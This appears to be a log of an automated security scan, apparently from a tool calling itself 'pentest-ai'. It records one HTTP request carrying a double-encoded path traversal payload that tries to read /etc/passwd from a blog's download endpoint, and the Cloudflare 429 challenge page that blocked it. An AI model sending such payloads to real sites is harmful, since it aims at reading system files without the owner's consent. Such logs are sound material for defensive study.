REQUEST:
GET https://my.myfirst.tech/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:31:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10004
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c83b94cc3aa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=JdvNj0nt3O%2FwMeEKFsn84%2F%2B%2BXMN9QpNtHwjUqEMpBCAF1x5kPFsXs7yrMIzlHLO7NcsboofhdprWMENoC8xO5xZNIfVvPyZfojvSTRDla%2FwqjfzurcHDcZUjlat5c2jo4CzisaR3ymF%2FT1IZCw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c83b94cc3aa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'D_XaDTW5TOPtkwsG2uM6zLPufwOU7YhgZzBNQnjC_gw-1784280676-1.2.1.1-FXNDlBlYNHYzmh98vtsGEp1LJeBVb7Y9G.gSB_QJjS3HyaeI4321GHUGH8l0VumC',cITimeS: '1784280676',cRay: 'a1c83b94cc3aa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_tk=Jo4TvalfgZ99OJxonpQX7GieiZYKSYpR7c9XSmZh_YQ-1784280676-1.0.1.1-bMu8Q0DdczMfJLtJI4YLRSqfB3xf4HrzUYbsEAWO4fs",cvId: '3',cZone: 'my.myfirst.tech',fa:"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_f_tk=Jo4TvalfgZ99OJxonpQX7GieiZYKSYpR7c9XSmZh_YQ-1784280676-1.0.1.1-bMu8Q0DdczMfJLtJI4YLRSqfB3xf4HrzUYbsEAWO4fs",md: 'SiFneeGyfM1YEJ37mntnMV7n8.z7cWXWCqMEFC247TA-1784280676-1.2.1.1-oj8iLzXL38mbp.yiJEqjkbYeViC3aZbFqBheb7JZw.O02sgs8JFv.YVWt0JGn67SbHwMkOJ.DIPnQhIwXAkdqRSkEO_B4i.9tAobKWvGTk7y3A27iOBMJMmfgj8zzJpNyKKNeI2SLBFxjd81A2kSjqhtvs41SSok7JH7iHFoaEdWyi7ZcznHEgjsErqvD95dRb51EipNUPXyZaQCH8FiNzFuYWXzcwjfOU8KcvuOhj2iDVSQd1fF4F4SZdE2ociu6WuIMPRJQCaO0owDIcFJUUWu7bKlOiP15.WhLTJv.hCGabFzY9LVQDb55DOUhRtpm87mhdUtA.j3RQ0_A6M1.t9xql9Ijp25wA8J6efciiUC2R63nr0tgJa6rEBEmZ.xQM5RsawDsSOtKET5oRFiVU0jv.cMOm1ocjvFUfAqZXVly_N_7.olO_NXyf1B.I_02mJyeKnvmMR7liBr6muI92oGhjVke4grkkXrRwRXqTSP8uQprag0KutHfLlFa4oJ0ejuIuuHeRM9l43Mwn_wQqdNdNgFDHcvlLHQ0B_vcmpWIxeYMO_p0M000j_kTrVBNJB8guf4068FUvVD4FvksV7gZLHlJLpKeFXWGTSA3Cm1NIE0R5c.Tq0QvYH41yra42MZnx1XKLww8Ms6LAr80hkaEdK_9LUFvRbSlIPDdiZ_ZTy4kmpIZUjtsDJ0Mibi4o3rNAlBrvuKt39mP1nb2Eo4YbqfdGcZaA6F5VjrtM2P5TRhNFqxNUz4z2jZ66Wv0RwScaDch8TNJtfUgbjKf3peCtKZ.nbUwU3qMosN8lLCTMFPSrd05dY6RYugt.hROI2FbbIMq.c0GL73iRL_ejfDFynD1A9uhw0kZ_QigBK_WxgTVNMMKp5ESkV0PCMGMvuWAwBwOb5Ir.8p.pD3HeKaveWn1EieOch1KvSGKeXXSVbU6HN_DnFHAFwjKTRDs6lBZW9Q5.jX1Kqy.2f0qcC25aZ38e62BzUrvXwqWamNn6OeRboDHOz8iTxsG2kEpQZM09UNoXh._.rNAMFtolHa9tJ54uHsEuNYzKSAci298F9jeH8iTA3AhKF..JJ0T2Tixs0BhLUsJ46OAw.Wgz4fmCbETqvbRBaW..pE8lKoAeGwe8q91QdWP.B568GlQbkYS.7yypWKMHpZ6kFbdlL_662gz2myGOGQOahPQK9OfJo6HVPk.Rzz13JBCDxVyq8MKxE9gmBfDZMb7lYdSER3z5wojS0DoWoyPFpHraq0BTbEEpIPZJWhtAfNNQZCkcduXGQULkaUTahjaMsI8SeTnawxk9TsWuLlsxGhF0RUvL5I1Sc4tNoU7wdlZfmCqjwtsvzmlApD3Ujbx.9LfAAJIgI3ZKGTrkYgyAhMS1GLM9rDn82nEPF_Ao_ZVpJn',mdrd: 'u6KPybbPQZnQyHOOxixxRs3d3MBcq5lf_ZIGWwfOmYU-1784280676-1.2.1.1-yHkB.KmDnE1c2wXtZ.M8gCqtAcYTNSHdXIsHMH0QBdgORIEwJqGJ0.GmiMunh_wMjKmmDpUnZ6ELH19dxAjQfDgw9.Zv3yDUWwHTf2yxSi74FdxWFwDTD1_SU4gRLDeIdN9ggUY0dSsNz_5.TF4qg_yuECCDT_dinFkJRTQZ1St9oWu5_u6zLc30s3f2WlgzBmzMEsECSrtLzHC_sZe4Mb2IfG7c147BepLZHnaORn9gUn40iLO.Aja0t.hMq_x3',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c83b94cc3aa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/blogs/latest/cara-buat-duit-online-malaysia-5-kaedah-yang-ramai-tak-tahu/download?filename=%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2F%252e%252e%2Fetc%2Fpasswd\u0026__cf_chl_rt_tk=Jo4TvalfgZ99OJxonpQX7GieiZYKSYpR7c9XSmZh_YQ-1784280676-1.0.1.1-bMu8Q0DdczMfJLtJI4YLRSqfB3xf4HrzUYbsEAWO4fs"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
